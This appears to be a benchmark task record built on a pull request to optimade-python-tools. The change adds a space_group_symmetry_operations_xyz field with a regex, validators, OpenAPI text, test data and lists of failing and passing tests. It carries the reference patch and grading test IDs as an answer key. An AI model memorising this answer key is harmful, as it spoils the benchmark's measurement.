diff --git a/tests/server/entry_collections/test_indexes.py b/tests/server/entry_collections/test_indexes.py new file mode 100644 index 00000000..006bf2e8 --- /dev/null +++ b/tests/server/entry_collections/test_indexes.py @@ -0,0 +1,40 @@ +import pytest +from bson import ObjectId + +from optimade.server.config import CONFIG + + +@pytest.mark.skipif( + CONFIG.database_backend.value not in ("mongomock", "mongodb"), + reason="Skipping index test when testing the elasticsearch backend.", +) +def test_indexes_are_created_where_appropriate(client): + """Test that with the test config, default indices are made by + supported backends. This is tested by checking that we cannot insert + an entry with the same underlying ID as the test data, and that this + returns the appopriate database-specific error. + + """ + import pymongo.errors + + from optimade.server.query_params import EntryListingQueryParams + from optimade.server.routers import ENTRY_COLLECTIONS + + # get one structure with and try to reinsert it + for _type in ENTRY_COLLECTIONS: + result, _, _, _, _ = ENTRY_COLLECTIONS[_type].find( + EntryListingQueryParams(page_limit=1) + ) + assert result is not None + if isinstance(result, list): + result = result[0] + + # The ID is mapped to the test data ID (e.g., 'task_id'), so the index is actually on that + id_field = ENTRY_COLLECTIONS[_type].resource_mapper.get_backend_field("id") + + # Take the raw database result, extract the OPTIMADE ID and try to insert a canary + # document containing just that ID, plus a fake MongoDB ID to avoid '_id' clashes + canary = {id_field: result["id"], "_id": ObjectId(24 * "0")} + # Match either for "Duplicate" (mongomock) or "duplicate" (mongodb) + with pytest.raises(pymongo.errors.BulkWriteError, match="uplicate"): + ENTRY_COLLECTIONS[_type].insert([canary]) # type: ignore diff --git a/tests/test_config.json b/tests/test_config.json index b011371a..43787f4e 100644 --- a/tests/test_config.json +++ b/tests/test_config.json @@ -17,6 +17,7 
@@ "mongo_count_timeout": 0, "index_base_url": "http://localhost:5001", "insert_from_jsonl": "optimade/server/data/test_data.jsonl", + "create_default_index": true, "provider_fields": { "structures": [ "band_gap",
[ "tests/server/entry_collections/test_indexes.py::test_indexes_are_created_where_appropriate" ]
[]
Method: EntryCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/entry_collections.py – class EntryCollection Inputs: - **data** – a list containing either `EntryResource` objects (already mapped to the backend format) or raw `dict` objects representing OPTIMADE entries. No validation is performed; callers must ensure the items are correctly formatted for the underlying database. Outputs: - Returns `None`. May propagate database‑specific exceptions (e.g., duplicate‑key errors) raised by concrete implementations. Description: Abstract method that bulk‑inserts entries into the underlying database. The signature was widened to accept plain dictionaries, allowing callers such as the test suite to insert a minimal canary document without constructing a full `EntryResource` instance. Method: MongoCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/mongo.py – class MongoCollection Inputs: - **data** – list of entry representations (either `EntryResource` instances or raw `dict`s) to be written to a MongoDB collection. No validation is performed. Outputs: - Returns `None`. May raise `pymongo.errors.BulkWriteError` (e.g., on duplicate `_id` or unique‑index violations). Description: Concrete MongoDB implementation of the bulk‑insert operation. The method now forwards the mixed‑type list to `collection.insert_many(..., ordered=False)`, enabling the test to insert a dictionary containing only the `id` field and trigger the unique‑index error handling. Method: ElasticCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/elasticsearch.py – class ElasticCollection Inputs: - **data** – list of entries, each either an `EntryResource` object or a raw dictionary ready for Elasticsearch indexing. No validation is performed. Outputs: - Returns `None`. 
May raise Elasticsearch‑specific exceptions on bulk‑indexing failures (e.g., duplicate‑id errors). Description: Elasticsearch implementation of the bulk‑insert operation. The signature was updated to accept raw dictionaries, matching the new abstract definition and allowing the test suite to insert a minimal document for index‑duplicate detection.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/entry_collections/test_indexes.py" }
{ "num_modified_files": 6, "num_modified_lines": 116, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests improved JSONL insertion error handling, parallel MongoDB inserts, and optional index creation via a new config flag. The provided test checks that default indices are created when the flag is true, aligning with the described behavior. No mismatches, external dependencies, or ambiguous specifications are present. Therefore the task is clearly defined and solvable, classified as A.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, 
"test_sample_without_replacement": null } }
e171370b70f66dd849211689b5f4aad3a766d6fb
2025-02-28 12:35:08
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report Attention: Patch coverage is `90.90909%` with `1 line` in your changes missing coverage. Please review. > Project coverage is 90.58%. Comparing base [(`e171370`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e171370b70f66dd849211689b5f4aad3a766d6fb?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`e86fcd4`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e86fcd40013711fc240a06aa33f79cb1208d1ffb?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). | [Files with missing lines](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Patch % | Lines | |---|---|---| | [optimade/models/structures.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?src=pr&el=tree&filepath=optimade%2Fmodels%2Fstructures.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | 88.88% | [1 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2236 +/- ## ========================================== + Coverage 90.57% 90.58% +0.01% 
========================================== Files 75 75 Lines 4889 4899 +10 ========================================== + Hits 4428 4438 +10 Misses 461 461 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.58% <90.90%> (+0.01%)` | :arrow_up: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.58% <90.90%> (+0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2236
diff --git a/openapi/openapi.json b/openapi/openapi.json index e2c67e8e..94ef86e7 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -4340,6 +4340,24 @@ "x-optimade-support": "should", "x-optimade-unit": "\u00c5" }, + "space_group_symmetry_operations_xyz": { + "anyOf": [ + { + "items": { + "type": "string", + "pattern": "^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" + }, + "type": "array" + }, + { + "type": "null" + } + ], + "title": "Space Group Symmetry Operations Xyz", + "description": "A list of symmetry operations given as general position x, y and z coordinates in algebraic form.\n\n- **Type**: list of strings\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - The property is RECOMMENDED if coordinates are returned in a form to which these operations can or must be applied (e.g. fractional atom coordinates of an asymmetric unit).\n - The property is REQUIRED if symmetry operations are necessary to reconstruct the full model of the material and no other symmetry information (e.g., the Hall symbol) is provided that would allow the user to derive symmetry operations unambiguously.\n - **Query***: Support for queries on this property is not required and in fact is NOT RECOMMENDED.\n - MUST be `null` if `nperiodic_dimensions` is equal to 0.\n - Each symmetry operation is described by a string that gives that symmetry operation in Jones' faithful representation (Bradley & Cracknell, 1972: pp. 
35-37), adapted for computer string notation.\n - The letters `x`, `y` and `z` that are typesetted with overbars in printed text represent coordinate values multiplied by -1 and are encoded as `-x`, `-y` and `-z`, respectively.\n - The syntax of the strings representing symmetry operations MUST conform to regular expressions given in appendix The Symmetry Operation String Regular Expressions.\n - The interpretation of the strings MUST follow the conventions of the IUCr CIF core dictionary (IUCr, 2023). In particular, this property MUST explicitly provide all symmetry operations needed to generate all the atoms in the unit cell from the atoms in the asymmetric unit, for the setting used.\n - This symmetry operation set MUST always include the `x,y,z` identity operation.\n - The symmetry operations are to be applied to fractional atom coordinates. In case only Cartesian coordinates are available, these Cartesian coordinates must be converted to fractional coordinates before the application of the provided symmetry operations.\n - If the symmetry operation list is present, it MUST be compatible with other space group specifications (e.g. 
the ITC space group number, the Hall symbol, the Hermann-Mauguin symbol) if these are present.\n\n- **Examples**:\n - Space group operations for the space group with ITC number 3 (H-M symbol `P 2`, extended H-M symbol `P 1 2 1`, Hall symbol `P 2y`): `[\"x,y,z\", \"-x,y,-z\"]`\n - Space group operations for the space group with ITC number 5 (H-M symbol `C 2`, extended H-M symbol `C 1 2 1`, Hall symbol `C 2y`): `[\"x,y,z\", \"-x,y,-z\", \"x+1/2,y+1/2,z\", \"-x+1/2,y+1/2,-z\"]`\n\n- **Notes**: The list of space group symmetry operations applies to the whole periodic array of atoms and together with the lattice translations given in the `lattice_vectors` property provides the necessary information to reconstruct all atom site positions of the periodic material.\n Thus, the symmetry operations described in this property are only applicable to material models with at least one periodic dimension.\n This property is not meant to represent arbitrary symmetries of molecules, non-periodic (finite) collections of atoms or non-crystallographic symmetry.\n\n- **Bibliographic References**:\n - Bradley, C. J. and Cracknell, A. P. (1972) The Mathematical Theory of Symmetry in Solids. Oxford, Clarendon Press (paperback edition 2010) 745 p. ISBN 978-0-19-958258-7.\n - IUCr (2023) Core dictionary (coreCIF) version 2.4.5; data name `_space_group_symop_operation_xyz`. 
Available from: https://www.iucr.org/__data/iucr/cifdic_html/1/cif_core.dic/Ispace_group_symop_operation_xyz.html [Accessed 2023-06-18T16:46+03:00].", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, "cartesian_site_positions": { "anyOf": [ { diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c9d724e0..c61770a8 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -6,7 +6,7 @@ from typing import TYPE_CHECKING, Annotated, Literal, Optional from pydantic import BaseModel, BeforeValidator, Field, field_validator, model_validator from optimade.models.entries import EntryResource, EntryResourceAttributes -from optimade.models.types import ChemicalSymbol +from optimade.models.types import ChemicalSymbol, SymmetryOperation from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, @@ -564,6 +564,43 @@ Note: the elements in this list each refer to the direction of the corresponding ), ] = None + space_group_symmetry_operations_xyz: Annotated[ + list[SymmetryOperation] | None, + OptimadeField( + description="""A list of symmetry operations given as general position x, y and z coordinates in algebraic form. + +- **Type**: list of strings + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - The property is RECOMMENDED if coordinates are returned in a form to which these operations can or must be applied (e.g. fractional atom coordinates of an asymmetric unit). + - The property is REQUIRED if symmetry operations are necessary to reconstruct the full model of the material and no other symmetry information (e.g., the Hall symbol) is provided that would allow the user to derive symmetry operations unambiguously. + - **Query***: Support for queries on this property is not required and in fact is NOT RECOMMENDED. + - MUST be `null` if `nperiodic_dimensions` is equal to 0. 
+ - Each symmetry operation is described by a string that gives that symmetry operation in Jones' faithful representation (Bradley & Cracknell, 1972: pp. 35-37), adapted for computer string notation. + - The letters `x`, `y` and `z` that are typesetted with overbars in printed text represent coordinate values multiplied by -1 and are encoded as `-x`, `-y` and `-z`, respectively. + - The syntax of the strings representing symmetry operations MUST conform to regular expressions given in appendix The Symmetry Operation String Regular Expressions. + - The interpretation of the strings MUST follow the conventions of the IUCr CIF core dictionary (IUCr, 2023). In particular, this property MUST explicitly provide all symmetry operations needed to generate all the atoms in the unit cell from the atoms in the asymmetric unit, for the setting used. + - This symmetry operation set MUST always include the `x,y,z` identity operation. + - The symmetry operations are to be applied to fractional atom coordinates. In case only Cartesian coordinates are available, these Cartesian coordinates must be converted to fractional coordinates before the application of the provided symmetry operations. + - If the symmetry operation list is present, it MUST be compatible with other space group specifications (e.g. the ITC space group number, the Hall symbol, the Hermann-Mauguin symbol) if these are present. 
+ +- **Examples**: + - Space group operations for the space group with ITC number 3 (H-M symbol `P 2`, extended H-M symbol `P 1 2 1`, Hall symbol `P 2y`): `["x,y,z", "-x,y,-z"]` + - Space group operations for the space group with ITC number 5 (H-M symbol `C 2`, extended H-M symbol `C 1 2 1`, Hall symbol `C 2y`): `["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"]` + +- **Notes**: The list of space group symmetry operations applies to the whole periodic array of atoms and together with the lattice translations given in the `lattice_vectors` property provides the necessary information to reconstruct all atom site positions of the periodic material. + Thus, the symmetry operations described in this property are only applicable to material models with at least one periodic dimension. + This property is not meant to represent arbitrary symmetries of molecules, non-periodic (finite) collections of atoms or non-crystallographic symmetry. + +- **Bibliographic References**: + - Bradley, C. J. and Cracknell, A. P. (1972) The Mathematical Theory of Symmetry in Solids. Oxford, Clarendon Press (paperback edition 2010) 745 p. ISBN 978-0-19-958258-7. + - IUCr (2023) Core dictionary (coreCIF) version 2.4.5; data name `_space_group_symop_operation_xyz`. Available from: https://www.iucr.org/__data/iucr/cifdic_html/1/cif_core.dic/Ispace_group_symop_operation_xyz.html [Accessed 2023-06-18T16:46+03:00].""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ), + ] = None + cartesian_site_positions: Annotated[ list[Vector3D] | None, OptimadeField( @@ -1069,6 +1106,23 @@ The properties of the species are found in the property `species`. return value + @model_validator(mode="after") + def check_symmetry_operations(self) -> "StructureResourceAttributes": + if self.nperiodic_dimensions == 0 and self.space_group_symmetry_operations_xyz: + raise ValueError( + "Non-periodic structures MUST NOT have space group symmetry operations." 
+ ) + + if ( + self.space_group_symmetry_operations_xyz + and "x,y,z" not in self.space_group_symmetry_operations_xyz + ): + raise ValueError( + "The identity operation 'x,y,z' MUST be included in the space group symmetry operations, if provided." + ) + + return self + @model_validator(mode="after") def validate_structure_features(self) -> "StructureResourceAttributes": if [ diff --git a/optimade/models/types.py b/optimade/models/types.py index 8ed7f99d..d081db51 100644 --- a/optimade/models/types.py +++ b/optimade/models/types.py @@ -7,12 +7,15 @@ from optimade.models.utils import ( ELEMENT_SYMBOLS_PATTERN, EXTENDED_CHEMICAL_SYMBOLS_PATTERN, SEMVER_PATTERN, + SYMMETRY_OPERATION_REGEXP, ) __all__ = ("ChemicalSymbol", "SemanticVersion") ChemicalSymbol = Annotated[str, Field(pattern=EXTENDED_CHEMICAL_SYMBOLS_PATTERN)] +SymmetryOperation = Annotated[str, Field(pattern=SYMMETRY_OPERATION_REGEXP)] + ElementSymbol = Annotated[str, Field(pattern=ELEMENT_SYMBOLS_PATTERN)] SemanticVersion = Annotated[ diff --git a/optimade/models/utils.py b/optimade/models/utils.py index fde64c6e..75ad8eb4 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -233,6 +233,7 @@ ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """ CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" +SYMMETRY_OPERATION_REGEXP = r"^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" EXTRA_SYMBOLS = ["X", "vacancy"]
Add support for `space_group_symmetry_operations_xyz` As above. Adds the OPTIMADE 1.2 field `space_group_symmetry_operations_xyz`, superseding #1422.
**Title** Add OPTIMADE 1.2 `space_group_symmetry_operations_xyz` support to the Structure model **Problem** The latest OPTIMADE specification introduces a new optional property describing symmetry operations in algebraic “x, y, z” notation. The library’s data model and OpenAPI description did not expose this field, and no validation existed for the required constraints (e.g., presence of the identity operation and prohibition for non‑periodic structures). **Root Cause** The schema definitions and pydantic models lacked an entry for the new property and the associated type/regex, and the model did not enforce the specification‑defined rules. **Fix / Expected Behavior** - Expose the `space_group_symmetry_operations_xyz` attribute in the Structure resource with proper OPTIMADE metadata (optional support, optional queryability). - Define a dedicated string type constrained by the official symmetry‑operation regular expression. - Extend the OpenAPI specification to include the new property, its description, and metadata. - Add model‑level validation that: • rejects symmetry operations for structures with zero periodic dimensions, and • requires the identity operation “x,y,z” when any operations are supplied. **Risk & Validation** - Ensure existing payloads without the new field remain valid (field is optional). - Run the full test suite and verify OpenAPI output to confirm the property appears correctly and validation triggers appropriate errors for non‑conforming data. - Check that the added regex does not inadvertently reject legitimate symmetry strings used in current datasets.
2,236
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 3d8b2539..2e9fd5c5 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -191,6 +191,7 @@ def compare_lossy_conversion( "immutable_id", "species", "fractional_site_positions", + "space_group_symmetry_operations_xyz", ) array_keys = ("cartesian_site_positions", "lattice_vectors") diff --git a/tests/models/test_data/test_bad_structures.json b/tests/models/test_data/test_bad_structures.json index 95f67c1f..eecfe3cb 100644 --- a/tests/models/test_data/test_bad_structures.json +++ b/tests/models/test_data/test_bad_structures.json @@ -2331,5 +2331,71 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["site_attachments"] + }, + { + "task_id": "db/1234567", + "type": "structure", + "last_modified": { + "$date": "inf" + }, + "band_gap": 1.23456, + "chemsys": "C-H-Cl-N-Na-O-Os-P", + "elements": ["C", "Cl", "H", "N", "Na", "O", "Os", "P"], + "nelements": 8, + "nsites": 7, + "elements_ratios": [0.09090909091, 0.36363636363, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091], + "chemical_formula_reduced": "CClH4NNaOOsP", + "chemical_formula_hill": "H4CClNNaOOsP", + "chemical_formula_descriptive": "Methyl-ClNNaOOsP", + "formula_anonymous": "A4BCDEFGH", + "dimension_types": [1, 1, 1], + "nperiodic_dimensions": 3, + "lattice_vectors": [[4.0,0.0,0.0],[0.0, 4.0, 0.0],[0.0,1.0,4.0]], + "cartesian_site_positions": [ [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0] ], + "species_at_sites": ["Cl", "O", "N", "met", "Os", "Na", "P"], + "species": [ + {"name": "Cl", "chemical_symbols": ["Cl"], "concentration": [1.0] }, + {"name": "O", "chemical_symbols": ["O"], "concentration": [1.0], "mass": [12.0, 14.0] }, + {"name": "N", "chemical_symbols": ["N"], "concentration": [1.0] }, + {"name": "met", "chemical_symbols": ["C"], 
"concentration": [1.0], "attached": ["H"], "nattached": [4] }, + {"name": "Os", "chemical_symbols": ["Os"], "concentration": [1.0] }, + {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, + {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } + ], + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["-x,-y,-z"] + }, + { + "task_id": "db/1234567", + "type": "structure", + "last_modified": { + "$date": "inf" + }, + "band_gap": 1.23456, + "chemsys": "C-H-Cl-N-Na-O-Os-P", + "elements": ["C", "Cl", "H", "N", "Na", "O", "Os", "P"], + "nelements": 8, + "nsites": 7, + "elements_ratios": [0.09090909091, 0.36363636363, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091], + "chemical_formula_reduced": "CClH4NNaOOsP", + "chemical_formula_hill": "H4CClNNaOOsP", + "chemical_formula_descriptive": "Methyl-ClNNaOOsP", + "formula_anonymous": "A4BCDEFGH", + "dimension_types": [1, 1, 1], + "nperiodic_dimensions": 0, + "lattice_vectors": [[4.0,0.0,0.0],[0.0, 4.0, 0.0],[0.0,1.0,4.0]], + "cartesian_site_positions": [ [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0] ], + "species_at_sites": ["Cl", "O", "N", "met", "Os", "Na", "P"], + "species": [ + {"name": "Cl", "chemical_symbols": ["Cl"], "concentration": [1.0] }, + {"name": "O", "chemical_symbols": ["O"], "concentration": [1.0], "mass": [12.0, 14.0] }, + {"name": "N", "chemical_symbols": ["N"], "concentration": [1.0] }, + {"name": "met", "chemical_symbols": ["C"], "concentration": [1.0], "attached": ["H"], "nattached": [4] }, + {"name": "Os", "chemical_symbols": ["Os"], "concentration": [1.0] }, + {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, + {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } + ], + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,-y,-z"] } ] diff --git a/tests/models/test_data/test_good_structures.json 
b/tests/models/test_data/test_good_structures.json index b8460583..c06a32dc 100644 --- a/tests/models/test_data/test_good_structures.json +++ b/tests/models/test_data/test_good_structures.json @@ -125,7 +125,8 @@ "group_probabilities": [0.3, 0.5, 0.2] } ], - "structure_features": ["assemblies", "implicit_atoms"] + "structure_features": ["assemblies", "implicit_atoms"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z"] }, { "task_id": "db/1234567", @@ -189,7 +190,8 @@ {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], - "structure_features": ["site_attachments"] + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"] }, { "task_id": "db/1234567", @@ -221,6 +223,7 @@ {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], - "structure_features": ["disorder", "site_attachments"] + "structure_features": ["disorder", "site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z"] } ] diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index d9d1aaeb..bafee17d 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -203,6 +203,14 @@ deformities = ( {"chemical_formula_anonymous": "A44B15C9D4E3F2GHI0J0K0L0"}, "String should match pattern", ), + ( + {"space_group_symmetry_operations_xyz": ["-x,-y,-z"]}, + "The identity operation 'x,y,z' MUST be included in the space group symmetry operations, if provided.", + ), + ( + {"space_group_symmetry_operations_xyz": ["xy,z"]}, + "String should match pattern", + ), ) diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 4c0e1972..3e02ca41 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = 
cli.list_properties("structures") for database in results: - assert len(results[database]) == 22, str(results[database]) + assert len(results[database]) == 23, str(results[database]) results = cli.search_property("structures", "site") for database in results:
[ "tests/models/test_structures.py::test_structure_fatal_deformities[deformity28]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity29]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]" ]
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/adapters/structures/test_structures.py::test_load_good_structure_from_url", "tests/adapters/structures/test_structures.py::test_load_bad_structure_from_url", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", 
"tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", 
